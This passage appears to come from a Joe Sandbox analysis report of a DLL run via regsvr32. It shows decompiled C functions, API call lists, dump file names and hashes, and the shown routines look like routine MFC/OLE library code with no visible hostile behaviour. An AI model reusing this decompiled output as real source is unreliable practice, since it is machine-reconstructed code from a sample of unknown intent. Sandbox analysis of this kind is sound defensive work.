										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x1003b2fc, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E100131E9(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E1001E462(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E100131AB(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x1003b30c);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E100149D9(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x1003b1ec, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}

APIs

__EH_prolog3.LIBCMT ref: 10016318

Part of subcall function 100149D9: SysStringLen.OLEAUT32(?), ref: 100149E1
Part of subcall function 100149D9: CoGetClassObject.OLE32(?,?,00000000,1003B22C,?), ref: 100149FF

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 100164A2
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 100164C3
GlobalAlloc.KERNEL32(00000000,00000000), ref: 10016510
GlobalLock.KERNEL32 ref: 1001651E
GlobalUnlock.KERNEL32(?), ref: 10016536
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10016559
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10016575

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
Instruction ID: 65bcce977c73c7d4b95501f4a81464407c87b4e582750ec1064cf11d2baf797c
Opcode Fuzzy Hash: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
Instruction Fuzzy Hash: 20C108B090065ADFDB00DFA4CC889AEB7BAFF48344F504969F916EB251C771DA91CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10005BC3 Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10005BC3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E100110BD(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100110BD( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 10005BE0
lstrcmpA.KERNEL32(?,?), ref: 10005BEC
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10005BFE
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C1E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C26
GlobalLock.KERNEL32 ref: 10005C30
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10005C3D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10005C55

Part of subcall function 100110BD: GlobalFlags.KERNEL32(?), ref: 100110C8
Part of subcall function 100110BD: GlobalUnlock.KERNEL32(?,?,00000000,10005C4F,?,00000000,?,?,00000000,00000000,00000002), ref: 100110DA
Part of subcall function 100110BD: GlobalFree.KERNEL32 ref: 100110E5

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
Instruction ID: 834996e4caf1481c9af349bd82c863b941331106e3d5840b272905be7d33e105
Opcode Fuzzy Hash: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
Instruction Fuzzy Hash: D3114875500A04BEEB129BA6CD89CAF7AEDEB89781B104519FA01D9122DA32E981D760

Uniqueness

Uniqueness Score: -1.00%

Function 10010DF8 Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010DF8(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x10048618 = GetSystemMetrics(2) + 1;
				 *0x1004861c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x10010e03
0x10010e09
0x10010e10
0x10010e18
0x10010e22
0x10010e33
0x10010e3d
0x10010e45
0x10010e51

APIs

GetSystemMetrics.USER32 ref: 10010E05
GetSystemMetrics.USER32 ref: 10010E0C
GetSystemMetrics.USER32 ref: 10010E13
GetSystemMetrics.USER32 ref: 10010E1D
GetDC.USER32(00000000), ref: 10010E27
GetDeviceCaps.GDI32(00000000,00000058), ref: 10010E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10010E40
ReleaseDC.USER32 ref: 10010E48

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
Instruction ID: e4bb4a9781883fca1ffd26e7a91d1cf17580d25377b1e53741b6ed809414a6cf
Opcode Fuzzy Hash: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
Instruction Fuzzy Hash: 8DF03671A40714AEF7206F718C8EF2B7BB4EB86B11F01891AE6418F1D1D6B599018F94

Uniqueness

Uniqueness Score: -1.00%

Function 1000E09F Relevance: 10.8, APIs: 7, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E1000E09F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x10045580; // 0x771f5646
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E1001FBC4(E100338B7, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E1000424F(_t246 + 0x28, E1001044F());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E10004D4A(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E1001587F(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E100054DB(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E1001B444(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E10013723(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E10013CC0( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E10014EA9( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E1000DFFE(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E1001B7A6(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					E10001260( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E1001FBB5(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1000E0B8
MapDialogRect.USER32(?,00000000), ref: 1000E149
SysAllocStringLen.OLEAUT32(?,?), ref: 1000E168
CLSIDFromString.OLE32(?,?,00000000), ref: 1000E25A

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

CLSIDFromProgID.OLE32(?,?,00000000), ref: 1000E262
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 1000E2FC
SysFreeString.OLEAUT32(00000000), ref: 1000E34E

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
Instruction ID: a3f1bd5bd1abf24c4919bb55c1ab413f5f44746dc04b4daccf7064a6dc2a22e9
Opcode Fuzzy Hash: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
Instruction Fuzzy Hash: EFB1F3B5900259AFEB04DFA8C984AED7BF4FF08344F05812AFC19A7251E774E994CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A49E Relevance: 10.6, APIs: 7, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E1001A49E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E1001FBC4(E100346AE, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E1001FC9C(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E1000911A(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E10020F40(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E1001BDF4(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E10019F87(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E1001BDD4(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x1003b21c);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x1003b19c, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}

0x1001a49e
0x1001a49e
0x1001a4a5
0x1001a4aa
0x1001a4b1
0x1001a4b8
0x1001a4bb
0x1001a4be
0x1001a624
0x1001a624
0x1001a62f
0x00000000
0x00000000
0x00000000
0x1001a4c4
0x1001a4c4
0x1001a4ca
0x1001a4cd
0x1001a4d3
0x00000000
0x00000000
0x1001a4d9
0x1001a4de
0x1001a4e1
0x00000000
0x00000000
0x1001a4ed
0x1001a4f0
0x1001a500
0x1001a50a
0x1001a511
0x1001a516
0x1001a51d
0x1001a522
0x1001a526
0x1001a52a
0x1001a55f
0x1001a55f
0x1001a52c
0x1001a537
0x1001a540
0x1001a544
0x1001a54d
0x1001a551
0x1001a557
0x1001a557
0x1001a562
0x1001a568
0x1001a56e
0x1001a571
0x1001a574
0x1001a57a
0x1001a57f
0x1001a583
0x1001a586
0x1001a587
0x1001a58c
0x1001a591
0x1001a593
0x1001a5a2
0x1001a5b6
0x1001a5b9
0x1001a5bf
0x1001a5c2
0x1001a5cd
0x1001a5d2
0x1001a5d2
0x1001a5dc
0x1001a5e1
0x1001a5e1
0x1001a5eb
0x1001a5f0
0x1001a5f0
0x1001a5f6
